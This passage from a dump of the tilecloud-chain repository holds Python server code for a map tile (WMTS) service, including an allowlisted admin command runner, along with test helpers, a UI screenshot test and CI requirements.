commands[0].replace(\"_\", \"-\")\n\n allowed_commands = (\n self.gene.get_main_config()\n .config.get(\"server\", {})\n .get(\"allowed_commands\", [\"generate-tiles\", \"generate-controller\", \"generate-cost\"])\n )\n if command not in allowed_commands:\n return {\n \"error\": f\"The given command '{command}' is not allowed, allowed command are: \"\n f\"{', '.join(allowed_commands)}\"\n }\n add_role = False\n arguments = {c.split(\"=\")[0]: c.split(\"=\")[1:] for c in commands[1:]}\n if command == \"generate-tiles\":\n add_role = \"--get-hash\" not in arguments and \"--get-bbox\" not in arguments\n\n allowed_arguments = (\n self.gene.get_main_config()\n .config.get(\"server\", {})\n .get(\n \"allowed_arguments\",\n [\n \"--layer\",\n 
\"--get-hash\",\n \"--generate-legend-images\",\n \"--dump-config\",\n \"--get-bbox\",\n \"--help\",\n \"--ignore-errors\",\n \"--bbox\",\n \"--zoom\",\n \"--test\",\n \"--near\",\n \"--time\",\n \"--measure-generation-time\",\n \"--no-geom\",\n \"--dimensions\",\n \"--quiet\",\n \"--verbose\",\n \"--debug\",\n \"--get-hash\",\n \"--get-bbox\",\n ],\n )\n )\n for arg in arguments.keys():\n if arg.startswith(\"-\") and arg not in allowed_arguments:\n self.request.response.status_code = 400\n return {\n \"error\": (\n f\"The argument {arg} is not allowed, allowed arguments are: \"\n f\"{', '.join(allowed_arguments)}\"\n )\n }\n\n final_command = [\n command,\n f\"--host={self.request.host}\",\n f\"--config={self.gene.get_host_config_file(self.request.host)}\",\n ]\n if add_role:\n final_command += [\"--role=master\"]\n final_command += commands[1:]\n\n display_command = shlex.join(final_command)\n _LOG.info(\"Run the command `%s`\", display_command)\n env: Dict[str, str] = {}\n env.update(os.environ)\n env[\"FRONTEND\"] = \"noninteractive\"\n\n main = None\n if final_command[0] in [\"generate-tiles\", \"generate_tiles\"]:\n main = generate.main\n elif final_command[0] in [\"generate-controller\", \"generate_controller\"]:\n main = controller.main\n if main is not None:\n return_dict: Dict[str, Any] = {}\n proc = multiprocessing.Process(\n target=_run_in_process, args=(final_command, env, main, return_dict)\n )\n proc.start()\n proc.join()\n return return_dict\n\n completed_process = subprocess.run( # nosec # pylint: disable=subprocess-run-check\n final_command,\n capture_output=True,\n env=env,\n )\n\n if completed_process.returncode != 0:\n _LOG.warning(\n \"The command `%s` exited with an error code: %s\\nstdout:\\n%s\\nstderr:\\n%s\",\n display_command,\n completed_process.returncode,\n completed_process.stdout.decode(),\n completed_process.stderr.decode(),\n )\n\n stdout_parsed = _parse_stdout(completed_process.stdout.decode())\n out = _format_output(\n \"<br />\".join(stdout_parsed),\n int(os.environ.get(\"TILECLOUD_CHAIN_MAX_OUTPUT_LENGTH\", 1000)),\n )\n if completed_process.stderr:\n out += \"<br />Error:<br />\" + _format_output(\n completed_process.stderr.decode().replace(\"\\n\", \"<br />\"),\n int(os.environ.get(\"TILECLOUD_CHAIN_MAX_OUTPUT_LENGTH\", 1000)),\n )\n return {\n \"out\": out,\n \"error\": completed_process.returncode != 0,\n }\n\n @view_config(route_name=\"admin_test\", renderer=\"tilecloud_chain:templates/openlayers.html\") # type: ignore\n def admin_test(self) -> Dict[str, Any]:\n assert self.gene\n config = self.gene.get_host_config(self.request.host)\n main_config = self.gene.get_main_config()\n return {\n \"proj4js_def\": re.sub(\n r\"\\s+\",\n \" \",\n config.config[\"openlayers\"][\"proj4js_def\"],\n ),\n \"srs\": config.config[\"openlayers\"][\"srs\"],\n \"center_x\": config.config[\"openlayers\"][\"center_x\"],\n \"center_y\": config.config[\"openlayers\"][\"center_y\"],\n \"zoom\": config.config[\"openlayers\"][\"zoom\"],\n \"http_url\": urljoin(\n self.request.current_route_url(),\n \"/\" + main_config.config[\"server\"].get(\"wmts_path\", \"wmts\") + \"/\"\n if \"server\" in config.config\n else \"/\",\n ),\n }\n\n\ndef _parse_stdout(stdout: str) -> List[str]:\n stdout_parsed = []\n for line in stdout.splitlines():\n try:\n json_message = json.loads(line)\n msg = json_message[\"msg\"]\n if json_message.get(\"logger_name\", \"\").startswith(\"tilecloud\"):\n if \"full_message\" in json_message:\n full_message = 
json_message[\"full_message\"].replace(\"\\n\", \"<br />\")\n msg += f\"<br />{full_message}\"\n stdout_parsed.append(msg)\n except: # pylint: disable=bare-except\n stdout_parsed.append(line)\n return stdout_parsed\n\n\ndef _format_output(string: str, max_length: int = 1000) -> str:\n result = \"\"\n for line in string.splitlines():\n if len(string) > max_length:\n break\n if line.startswith(\"{\"):\n try:\n parsed = json.loads(line)\n if \"source_facility\" in parsed:\n if not parsed.startswith(\"tilecloud\"):\n continue\n\n if result:\n result += \"\\n\"\n\n if (\n \"level_name\" in parsed\n and \"source_facility\" in parsed\n and \"line\" in parsed\n and \"msg\" in parsed\n ):\n if parsed.startswith(\"tilecloud\"):\n result += (\n f\"[{parsed['level_name']}] {parsed['source_facility']}:{parsed['line']} \"\n f\"{parsed['msg']}\"\n )\n elif \"msg\" in parsed:\n result += parsed[\"msg\"]\n else:\n result += line\n except json.decoder.JSONDecodeError:\n if result:\n result += \"\\n\"\n result += line\n else:\n if result:\n result += \"\\n\"\n result += line\n\n if len(string) > max_length:\n return string[: max_length - 3] + \"\\n...\"\n return string\n\n\ndef _run_in_process(\n final_command: List[str],\n env: Dict[str, str],\n main: Callable[[List[str], IO[str]], Any],\n return_dict: Dict[str, Any],\n) -> None:\n display_command = shlex.join(final_command)\n error = False\n out = io.StringIO()\n try:\n for key, value in env.items():\n os.environ[key] = value\n _LOG.debug(\"Running the command `%s` using the function directly\", display_command)\n main(final_command, out)\n except Exception:\n _LOG.exception(\"Error while running the command `%s`\", display_command)\n error = True\n return_dict[\"out\"] = _format_output(\n \"<br />\".join(_parse_stdout(out.getvalue())),\n int(os.environ.get(\"TILECLOUD_CHAIN_MAX_OUTPUT_LENGTH\", 1000)),\n )\n return_dict[\"error\"] = error\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.7716049551963806, "avg_line_length": 31.399999618530273, "blob_id": "4da206b31014c505e13ba5d990a494a61881c725", "content_id": "4f628e0f33e1bcea619c7d6fb469ce2ca1eb0db4", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 162, "license_type": "permissive", "max_line_length": 47, "num_lines": 5, "path": "/ci/requirements.txt", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "c2cciutils[checks,publish]==1.5.8\npoetry-dynamic-versioning==0.25.0\npoetry-plugin-export==1.4.0\npoetry-plugin-tweak-dependencies-version==1.4.0\npre-commit==3.3.3\n" }, { "alpha_fraction": 0.5536445379257202, "alphanum_fraction": 0.5888615846633911, "avg_line_length": 28.780487060546875, "blob_id": "b51a653482b71cd89698b1a22ceddc77baabf063", "content_id": "ae95889e4554885fe81ef40d23e9a15e9bab6238", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1221, "license_type": "permissive", "max_line_length": 98, "num_lines": 41, "path": "/tilecloud_chain/tests/test_ui.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import os\nimport subprocess\n\nimport pytest\nimport skimage.io\nfrom c2cwsgiutils.acceptance.image import check_image\n\nREGENERATE = False\n\n\ndef test_should_not_commit():\n assert REGENERATE is False\n\n\[email protected](\n \"url,expected_file_name,height,width\",\n [\n pytest.param(\"http://application:8080/admin/\", \"not-login\", 250, 800, id=\"not-login\"),\n 
pytest.param(\"http://application:8080/admin/test\", \"test\", 800, 800, id=\"test-not-login\"),\n pytest.param(\"http://app_test_user:8080/admin\", \"index\", 500, 1000, id=\"index\"),\n pytest.param(\"http://app_test_user:8080/admin/test\", \"test\", 800, 800, id=\"test\"),\n ],\n)\ndef test_ui(url, expected_file_name, height, width):\n subprocess.run(\n [\n \"node\",\n \"screenshot.js\",\n f\"--url={url}\",\n f\"--width={width}\",\n f\"--height={height}\",\n f\"--output=/tmp/{expected_file_name}.png\",\n ],\n check=True,\n )\n check_image(\n \"/results\",\n skimage.io.imread(f\"/tmp/{expected_file_name}.png\")[:, :, :3],\n os.path.join(os.path.dirname(__file__), f\"{expected_file_name}.expected.png\"),\n generate_expected_image=REGENERATE,\n )\n" }, { "alpha_fraction": 0.530263364315033, "alphanum_fraction": 0.5343995690345764, "avg_line_length": 33.21226501464844, "blob_id": "558126e6a779f569569aad38f47b51585b9b92cb", "content_id": "b1773e140d6e88c3177c81e8eafab742498a0507", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7253, "license_type": "permissive", "max_line_length": 109, "num_lines": 212, "path": "/tilecloud_chain/tests/__init__.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport os\nimport re\nimport shutil\nimport sys\nimport traceback\nfrom io import StringIO\nfrom logging import config\nfrom typing import Any, Callable, List, Tuple, Union\nfrom unittest import TestCase\n\nimport yaml\n\nDIFF = 200\nlog = logging.getLogger(\"tests\")\n\nconfig.dictConfig(\n {\n \"version\": 1,\n \"loggers\": {\n \"default\": {\"level\": \"INFO\"},\n \"tilecloud\": {\"level\": \"DEBUG\"},\n \"tilecloud_chain\": {\"level\": \"DEBUG\"},\n },\n }\n)\n\n\nclass NoAliasDumper(yaml.SafeDumper):\n def ignore_aliases(self, data: Any) -> bool:\n return True\n\n\nclass CompareCase(TestCase):\n def assert_result_equals(self, result: str, expected: str, regex: bool = False) -> None:\n expected = expected.split(\"\\n\")\n result = re.sub(\"\\n[^\\n]*\\r\", \"\\n\", result)\n result = re.sub(\"^[^\\n]*\\r\", \"\", result)\n result = result.split(\"\\n\")\n for n, test in enumerate(zip(expected, result)):\n if test[0] != \"PASS...\":\n try:\n if regex:\n self.assertRegex(test[1].strip(), f\"^{test[0].strip()}$\")\n else:\n self.assertEqual(test[0].strip(), test[1].strip())\n except AssertionError as e:\n for i in range(max(0, n - DIFF), min(len(result), n + DIFF + 1)):\n if i == n:\n print(f\"> {i} {result[i]}\")\n log.info(f\"> {i} {result[i]}\")\n else:\n print(f\" {i} {result[i]}\")\n log.info(f\" {i} {result[i]}\")\n raise e\n self.assertEqual(len(expected), len(result), repr(result))\n\n def run_cmd(\n self, cmd: Union[List[str], str], main_func: Callable, get_error: bool = False\n ) -> Tuple[str, str]:\n old_stdout = sys.stdout\n sys.stdout = mystdout = StringIO()\n old_stderr = sys.stderr\n sys.stderr = mystderr = StringIO()\n try:\n self.assert_main_equals(cmd, main_func, [], get_error)\n except AssertionError:\n sys.stdout = old_stdout\n sys.stderr = old_stderr\n print(mystdout.getvalue())\n print(mystderr.getvalue())\n raise\n finally:\n sys.stdout = old_stdout\n sys.stderr = old_stderr\n log.info(mystdout.getvalue())\n log.info(mystderr.getvalue())\n return mystdout.getvalue(), mystderr.getvalue()\n\n def assert_cmd_equals(\n self, cmd: Union[List[str], str], main_func: Callable, empty_err: bool = False, **kargs: Any\n ) -> None:\n out, err = self.run_cmd(cmd, 
main_func)\n        if empty_err:\n            self.assertEqual(err, \"\")\n        if isinstance(out, bytes):\n            out = out.decode(\"utf-8\")\n        else:\n            out = str(out)\n        self.assert_result_equals(result=out, **kargs)\n\n    def assert_cmd_exit_equals(self, cmd: str, main_func: Callable) -> None:\n        sys.argv = re.sub(\" +\", \" \", cmd).split(\" \")\n        try:\n            main_func()\n            assert False, \"exit() not called.\"\n        except SystemExit:\n            pass\n\n    def assert_main_equals(\n        self,\n        cmd: Union[List[str], str],\n        main_func: Callable,\n        expected: List[List[str]] = None,\n        get_error: bool = False,\n        **kargs: Any,\n    ) -> None:\n        if expected:\n            for expect in expected:\n                if os.path.exists(expect[0]):\n                    os.remove(expect[0])\n        if isinstance(cmd, list):\n            sys.argv = cmd\n        else:\n            sys.argv = re.sub(\" +\", \" \", cmd).split(\" \")\n        try:\n            main_func()\n            assert get_error is False\n        except SystemExit as e:\n            if get_error:\n                assert e.code not in (None, 0), str(e)\n            else:\n                assert e.code in (None, 0), str(e)\n        except AssertionError:\n            raise\n        except Exception:\n            if not get_error:\n                log.exception(\"Unexpected error\")\n            assert get_error is True, traceback.format_exc()\n\n        if expected:\n            for expect in expected:\n                with open(expect[0]) as f:\n                    self.assert_result_equals(f.read(), expect[1], **kargs)\n\n    def assert_main_except_equals(\n        self, cmd: str, main_func: Callable, expected: List[List[str]], get_error: bool = False, **kargs: Any\n    ) -> None:\n        sys.argv = cmd.split(\" \")\n        try:\n            main_func()\n            assert get_error is False\n        except SystemExit as e:\n            if get_error:\n                assert e.code not in (None, 0), str(e)\n            else:\n                assert e.code in (None, 0), str(e)\n        except AssertionError:\n            raise\n        except Exception:\n            assert False, traceback.format_exc()\n\n        if expected:\n            for expect in expected:\n                with open(expect[0]) as f:\n                    self.assert_result_equals(f.read(), expect[1], **kargs)\n\n    def assert_yaml_equals(self, result: str, expected: str) -> None:\n        expected = yaml.dump(\n            yaml.safe_load(expected), width=120, default_flow_style=False, Dumper=NoAliasDumper\n        )\n        result = yaml.dump(yaml.safe_load(result), width=120, default_flow_style=False, Dumper=NoAliasDumper)\n        self.assert_result_equals(result=result, expected=expected)\n\n    def assert_cmd_yaml_equals(self, cmd: str, main_func: Callable, **kargs: Any) -> None:\n        old_stdout = sys.stdout\n        sys.stdout = mystdout = StringIO()\n        self.assert_main_equals(cmd, main_func, [])\n        sys.stdout = old_stdout\n        self.assert_yaml_equals(result=mystdout.getvalue(), **kargs)\n\n    def assert_tiles_generated(self, directory: str, **kargs: Any) -> None:\n        if os.path.exists(directory):\n            shutil.rmtree(directory, ignore_errors=True)\n\n        self.assert_tiles_generated_deleted(directory=directory, **kargs)\n\n    def assert_tiles_generated_deleted(\n        self, directory: str, tiles_pattern: str, tiles: Any, expected: str = \"\", **kargs: Any\n    ) -> None:\n        self.assert_cmd_equals(expected=expected, **kargs)\n        count = 0\n        for path, dirs, files in os.walk(directory):\n            if len(files) != 0:\n                log.info((path, files))\n                print((path, files))\n                count += len(files)\n\n        self.assertEqual(count, len(tiles))\n        for tile in tiles:\n            log.info(directory + tiles_pattern % tile)\n            print(directory + tiles_pattern % tile)\n            self.assertTrue(os.path.exists(directory + tiles_pattern % tile))\n\n    def assert_files_generated(self, **kargs):\n        self.assert_tiles_generated(tiles_pattern=\"%s\", **kargs)\n\n\nclass MatchRegex:\n    \"\"\"Assert that a given string meets some expectations.\"\"\"\n\n    def __init__(self, regex) -> None:\n        self._regex = re.compile(regex)\n\n    def __eq__(self, 
other: str) -> bool:\n return self._regex.match(other) is not None\n\n def match(self, other: str) -> re.Match:\n return self._regex.match(other)\n\n def __repr__(self):\n return self._regex.pattern\n" }, { "alpha_fraction": 0.8717948794364929, "alphanum_fraction": 0.8717948794364929, "avg_line_length": 38, "blob_id": "15889d07a67601d664cc5bef7a9d586af807ff8d", "content_id": "05da79d7bc5c1333095c4128cca67d3bdf19c5c8", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "INI", "length_bytes": 39, "license_type": "permissive", "max_line_length": 38, "num_lines": 1, "path": "/.sonarcloud.properties", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "sonar.exclusions=tilecloud_chain/tests\n" }, { "alpha_fraction": 0.5351784229278564, "alphanum_fraction": 0.5422918796539307, "avg_line_length": 38.19074630737305, "blob_id": "5d4a998cc5ac252261f6553b305f4764e5344feb", "content_id": "7bf3c02aebda8635efaf67f937ea60d93ec5ad2e", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 34723, "license_type": "permissive", "max_line_length": 115, "num_lines": 886, "path": "/tilecloud_chain/server.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# Copyright (c) 2013-2023 by Stéphane Brunner\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions\n# are met:\n# 1. Redistributions of source code must retain the above copyright\n# notice, this list of conditions and the following disclaimer.\n# 2. Redistributions in binary form must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer in the\n# documentation and/or other materials provided with the distribution.\n# 3. Neither the name of Camptocamp nor the names of its contributors may\n# be used to endorse or promote products derived from this software\n# without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\" AND\n# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n# DISCLAIMED. 
IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY\n# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES\n# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;\n# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\n# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS\n# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\nimport collections\nimport datetime\nimport json\nimport logging\nimport mimetypes\nimport os\nimport time\nfrom typing import TYPE_CHECKING, Any, Dict, Generic, List, Optional, TypeVar, Union, cast\nfrom urllib.parse import parse_qs, urlencode\n\nimport botocore.exceptions\nimport c2cwsgiutils.pyramid\nimport pyramid.response\nimport pyramid.session\nimport requests\nfrom azure.core.exceptions import ResourceNotFoundError\nfrom c2cwsgiutils import health_check\nfrom pyramid.config import Configurator\nfrom pyramid.httpexceptions import HTTPException, exception_response\nfrom pyramid.request import Request\nfrom pyramid.router import Router\nfrom pyramid_mako import add_mako_renderer\n\nimport tilecloud.store.s3\nimport tilecloud_chain.configuration\nimport tilecloud_chain.security\nfrom tilecloud import Tile, TileCoord\nfrom tilecloud_chain import TileGeneration, controller, internal_mapcache\nfrom tilecloud_chain.controller import get_azure_client\n\nlogger = logging.getLogger(__name__)\n\ntilegeneration = None\n\n\ndef init_tilegeneration(config_file: Optional[str]) -> None:\n \"\"\"Initialize the tile generation.\"\"\"\n global tilegeneration # pylint: disable=global-statement\n if tilegeneration is None:\n if config_file is not None:\n logger.info(\"Use config file: '%s'\", config_file)\n log_level = os.environ.get(\"TILE_SERVER_LOGLEVEL\")\n tilegeneration = TileGeneration(\n config_file,\n collections.namedtuple( # type: ignore\n \"Options\",\n [\"verbose\", \"debug\", \"quiet\", \"bbox\", \"zoom\", \"test\", \"near\", \"time\", \"geom\", \"ignore_error\"],\n )(\n log_level == \"verbose\", # type: ignore\n log_level == \"debug\",\n log_level == \"quiet\",\n None,\n None,\n None,\n None,\n None,\n True,\n False,\n ),\n configure_logging=False,\n multi_thread=False,\n maxconsecutive_errors=False,\n )\n\n\nResponse = TypeVar(\"Response\")\n\n\nclass DatedStore:\n \"\"\"Store with timestamp to be able to invalidate it on configuration change.\"\"\"\n\n def __init__(self, store: tilecloud.TileStore, mtime: float) -> None:\n \"\"\"Initialize.\"\"\"\n self.store = store\n self.mtime = mtime\n\n\nclass DatedFilter:\n \"\"\"Filter with timestamp to be able to invalidate it on configuration change.\"\"\"\n\n def __init__(self, layer_filter: Optional[tilecloud_chain.IntersectGeometryFilter], mtime: float) -> None:\n \"\"\"Initialize.\"\"\"\n self.filter = layer_filter\n self.mtime = mtime\n\n\nclass Server(Generic[Response]):\n \"\"\"The generic implementation of the WMTS server.\"\"\"\n\n def __init__(self) -> None:\n \"\"\"Initialize.\"\"\"\n try:\n self.filter_cache: Dict[str, Dict[str, DatedFilter]] = {}\n self.s3_client_cache: Dict[str, \"botocore.client.S3\"] = {}\n self.store_cache: Dict[str, Dict[str, DatedStore]] = {}\n\n assert tilegeneration\n\n self.wmts_path = tilegeneration.get_main_config().config[\"server\"][\"wmts_path\"]\n self.static_path = tilegeneration.get_main_config().config[\"server\"][\"static_path\"].split(\"/\")\n except Exception:\n 
logger.exception(\"Initialization error\")\n            raise\n\n    @staticmethod\n    def get_expires_hours(config: tilecloud_chain.DatedConfig) -> float:\n        \"\"\"Get the expiration time in hours.\"\"\"\n        return config.config.get(\"server\", {}).get(\"expires\", tilecloud_chain.configuration.EXPIRES_DEFAULT)\n\n    @staticmethod\n    def get_static_allow_extension(config: tilecloud_chain.DatedConfig) -> List[str]:\n        \"\"\"Get the allowed extensions in the static view.\"\"\"\n        return config.config[\"server\"].get(\n            \"static_allow_extension\", [\"jpeg\", \"png\", \"xml\", \"js\", \"html\", \"css\"]\n        )\n\n    @staticmethod\n    def get_cache_name(config: tilecloud_chain.DatedConfig) -> str:\n        \"\"\"Get the cache name.\"\"\"\n        return config.config[\"server\"].get(\"cache\", config.config[\"generation\"][\"default_cache\"])\n\n    def get_s3_client(self, config: tilecloud_chain.DatedConfig) -> \"botocore.client.S3\":\n        \"\"\"Get the AWS S3 client.\"\"\"\n        cache_s3 = cast(tilecloud_chain.configuration.CacheS3, self.get_cache(config))\n        if cache_s3.get(\"host\", \"aws\") in self.s3_client_cache:\n            return self.s3_client_cache[cache_s3.get(\"host\", \"aws\")]\n        for n in range(10):\n            try:\n                client = tilecloud.store.s3.get_client(cache_s3.get(\"host\"))\n                self.s3_client_cache[cast(str, cache_s3.get(\"host\", \"aws\"))] = client\n                return client\n            except KeyError as e:\n                error = e\n                time.sleep(n * 10)\n        raise error\n\n    def get_cache(self, config: tilecloud_chain.DatedConfig) -> tilecloud_chain.configuration.Cache:\n        \"\"\"Get the cache from the config.\"\"\"\n        return config.config[\"caches\"][self.get_cache_name(config)]\n\n    @staticmethod\n    def get_layers(config: tilecloud_chain.DatedConfig) -> List[str]:\n        \"\"\"Get the layers from the config.\"\"\"\n        layers: List[str] = cast(List[str], config.config[\"layers\"].keys())\n        return config.config[\"server\"].get(\"layers\", layers)\n\n    def get_filter(\n        self, config: tilecloud_chain.DatedConfig, layer_name: str\n    ) -> Optional[tilecloud_chain.IntersectGeometryFilter]:\n        \"\"\"Get the filter from the config.\"\"\"\n        dated_filter = self.filter_cache.get(config.file, {}).get(layer_name)\n\n        if dated_filter is not None and dated_filter.mtime == config.mtime:\n            return dated_filter.filter\n\n        assert tilegeneration\n\n        layer_filter = (\n            tilecloud_chain.IntersectGeometryFilter(gene=tilegeneration)\n            if config.config[\"server\"][\"geoms_redirect\"]\n            else None\n        )\n\n        self.filter_cache.setdefault(config.file, {})[layer_name] = DatedFilter(layer_filter, config.mtime)\n        return layer_filter\n\n    def get_store(self, config: tilecloud_chain.DatedConfig, layer_name: str) -> tilecloud.TileStore:\n        \"\"\"Get the store from the config.\"\"\"\n        dated_store = self.store_cache.get(config.file, {}).get(layer_name)\n\n        if dated_store is not None and dated_store.mtime == config.mtime:\n            return dated_store.store\n\n        assert tilegeneration\n\n        store = tilegeneration.get_store(config, self.get_cache(config), layer_name, read_only=True)\n        self.store_cache.setdefault(config.file, {})[layer_name] = DatedStore(store, config.mtime)\n        return store\n\n    @staticmethod\n    def get_max_zoom_seed(config: tilecloud_chain.DatedConfig, layer_name: str) -> int:\n        \"\"\"Get the max zoom to be seeded in the stored cache.\"\"\"\n        layer = config.config[\"layers\"][layer_name]\n        if \"min_resolution_seed\" in layer:\n            max_zoom_seed = -1\n            for zoom, resolution in enumerate(config.config[\"grids\"][layer[\"grid\"]][\"resolutions\"]):\n                if resolution > layer[\"min_resolution_seed\"]:\n                    max_zoom_seed = zoom\n            return max_zoom_seed\n        else:\n            
return 999999\n\n    def _read(\n        self,\n        key_name: str,\n        headers: Dict[str, str],\n        config: tilecloud_chain.DatedConfig,\n        **kwargs: Any,\n    ) -> Response:\n        cache = self.get_cache(config)\n        try:\n            cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n            bucket = cache_s3[\"bucket\"]\n            response = self.get_s3_client(config).get_object(Bucket=bucket, Key=key_name)\n            body = response[\"Body\"]\n            try:\n                headers[\"Content-Type\"] = response.get(\"ContentType\")\n                return self.response(config, body.read(), headers, **kwargs)\n            finally:\n                body.close()\n        except botocore.exceptions.ClientError as ex:\n            if ex.response[\"Error\"][\"Code\"] == \"NoSuchKey\":\n                return self.error(config, 404, key_name + \" not found\")\n            else:\n                raise\n\n    def _get(\n        self,\n        path: str,\n        headers: Dict[str, str],\n        config: tilecloud_chain.DatedConfig,\n        **kwargs: Any,\n    ) -> Response:\n        \"\"\"Get capabilities or other static files.\"\"\"\n        assert tilegeneration\n        cache = self.get_cache(config)\n\n        if cache[\"type\"] == \"s3\":\n            cache_s3 = cast(tilecloud_chain.configuration.CacheS3, cache)\n            key_name = os.path.join(cache_s3[\"folder\"], path)\n            try:\n                return self._read(key_name, headers, config, **kwargs)\n            except Exception:\n                del self.s3_client_cache[cache_s3.get(\"host\", \"aws\")]\n                return self._read(key_name, headers, config, **kwargs)\n        if cache[\"type\"] == \"azure\":\n            cache_azure = cast(tilecloud_chain.configuration.CacheAzure, cache)\n            key_name = os.path.join(cache_azure[\"folder\"], path)\n            try:\n                blob = get_azure_client().get_blob_client(container=cache_azure[\"container\"], blob=key_name)\n                properties = blob.get_blob_properties()\n                data = blob.download_blob().readall()\n                return self.response(\n                    config,\n                    data if isinstance(data, bytes) else data.encode(\"utf-8\"),  # type: ignore\n                    {\n                        \"Content-Encoding\": cast(str, properties.content_settings.content_encoding),\n                        \"Content-Type\": cast(str, properties.content_settings.content_type),\n                    },\n                    **kwargs,\n                )\n            except ResourceNotFoundError:\n                return self.error(config, 404, path + \" not found\", **kwargs)\n        else:\n            cache_filesystem = cast(tilecloud_chain.configuration.CacheFilesystem, cache)\n            folder = cache_filesystem[\"folder\"] or \"\"\n            if path.split(\".\")[-1] not in self.get_static_allow_extension(config):\n                return self.error(config, 403, \"Extension not allowed\", **kwargs)\n            p = os.path.join(folder, path)\n            if not os.path.isfile(p):\n                return self.error(config, 404, path + \" not found\", **kwargs)\n            with open(p, \"rb\") as file:\n                data = file.read()\n            content_type = mimetypes.guess_type(p)[0]\n            if content_type:\n                headers[\"Content-Type\"] = content_type\n            return self.response(config, data, headers, **kwargs)\n\n    def __call__(\n        self,\n        config: tilecloud_chain.DatedConfig,\n        config_file: str,\n        environ: Dict[str, str],\n        start_response: Any,\n    ) -> Response:\n        \"\"\"Build the response on request.\"\"\"\n        params = {}\n        for key, value in parse_qs(environ[\"QUERY_STRING\"], True).items():\n            params[key.upper()] = value[0]\n\n        path = None if len(params) > 0 else environ[\"PATH_INFO\"][1:].split(\"/\")\n\n        return self.serve(path, params, config=config, config_file=config_file, start_response=start_response)\n\n    def serve(\n        self,\n        path: Optional[List[str]],\n        params: Dict[str, str],\n        config: tilecloud_chain.DatedConfig,\n        **kwargs: Any,\n    ) -> Response:\n        \"\"\"Serve the WMTS requests.\"\"\"\n\n        if not config or not config.config:\n            return self.error(\n                config,\n                404,\n                \"No configuration file found for the host or the configuration has an error, see logs for 
details\",\n                **kwargs,\n            )\n\n        try:\n            dimensions = []\n            metadata = {}\n            assert tilegeneration\n\n            if path:\n                if tuple(path[: len(self.static_path)]) == tuple(self.static_path):\n                    return self._get(\n                        \"/\".join(path[len(self.static_path) :]),\n                        {\n                            \"Expires\": (\n                                datetime.datetime.utcnow()\n                                + datetime.timedelta(hours=self.get_expires_hours(config))\n                            ).isoformat(),\n                            \"Cache-Control\": f\"max-age={3600 * self.get_expires_hours(config)}\",\n                            \"Access-Control-Allow-Origin\": \"*\",\n                            \"Access-Control-Allow-Methods\": \"GET\",\n                        },\n                        config=config,\n                        **kwargs,\n                    )\n                elif len(path) >= 1 and path[0] != self.wmts_path:\n                    return self.error(\n                        config,\n                        404,\n                        f\"Type '{path[0]}' doesn't exist, allowed values: '{self.wmts_path}' or \"\n                        f\"'{'/'.join(self.static_path)}'\",\n                        **kwargs,\n                    )\n                path = path[1:]  # remove type\n\n            if path:\n                if len(path) == 2 and path[0] == \"1.0.0\" and path[1].lower() == \"wmtscapabilities.xml\":\n                    params[\"SERVICE\"] = \"WMTS\"\n                    params[\"VERSION\"] = \"1.0.0\"\n                    params[\"REQUEST\"] = \"GetCapabilities\"\n                elif len(path) < 7:\n                    return self.error(config, 400, \"Not enough path\", **kwargs)\n                else:\n                    params[\"SERVICE\"] = \"WMTS\"\n                    params[\"VERSION\"] = path[0]\n\n                    params[\"LAYER\"] = path[1]\n                    params[\"STYLE\"] = path[2]\n\n                    if params[\"LAYER\"] in self.get_layers(config):\n                        layer = cast(\n                            tilecloud_chain.configuration.LayerWms,\n                            config.config[\"layers\"][params[\"LAYER\"]],\n                        )\n                    else:\n                        return self.error(config, 400, f\"Wrong Layer '{params['LAYER']}'\", **kwargs)\n\n                    index = 3\n                    dimensions = path[index : index + len(layer.get(\"dimensions\", {}))]\n                    for dimension in layer.get(\"dimensions\", {}):\n                        metadata[\"dimension_\" + dimension[\"name\"]] = path[index]\n                        params[dimension[\"name\"].upper()] = path[index]\n                        index += 1\n\n                    last = path[-1].split(\".\")\n                    if len(path) < index + 4:\n                        return self.error(config, 400, \"Not enough path\", **kwargs)\n                    params[\"TILEMATRIXSET\"] = path[index]\n                    params[\"TILEMATRIX\"] = path[index + 1]\n                    params[\"TILEROW\"] = path[index + 2]\n                    if len(path) == index + 4:\n                        params[\"REQUEST\"] = \"GetTile\"\n                        params[\"TILECOL\"] = last[0]\n                        if last[1] != layer[\"extension\"]:\n                            return self.error(config, 400, f\"Wrong extension '{last[1]}'\", **kwargs)\n                    elif len(path) == index + 6:\n                        params[\"REQUEST\"] = \"GetFeatureInfo\"\n                        params[\"TILECOL\"] = 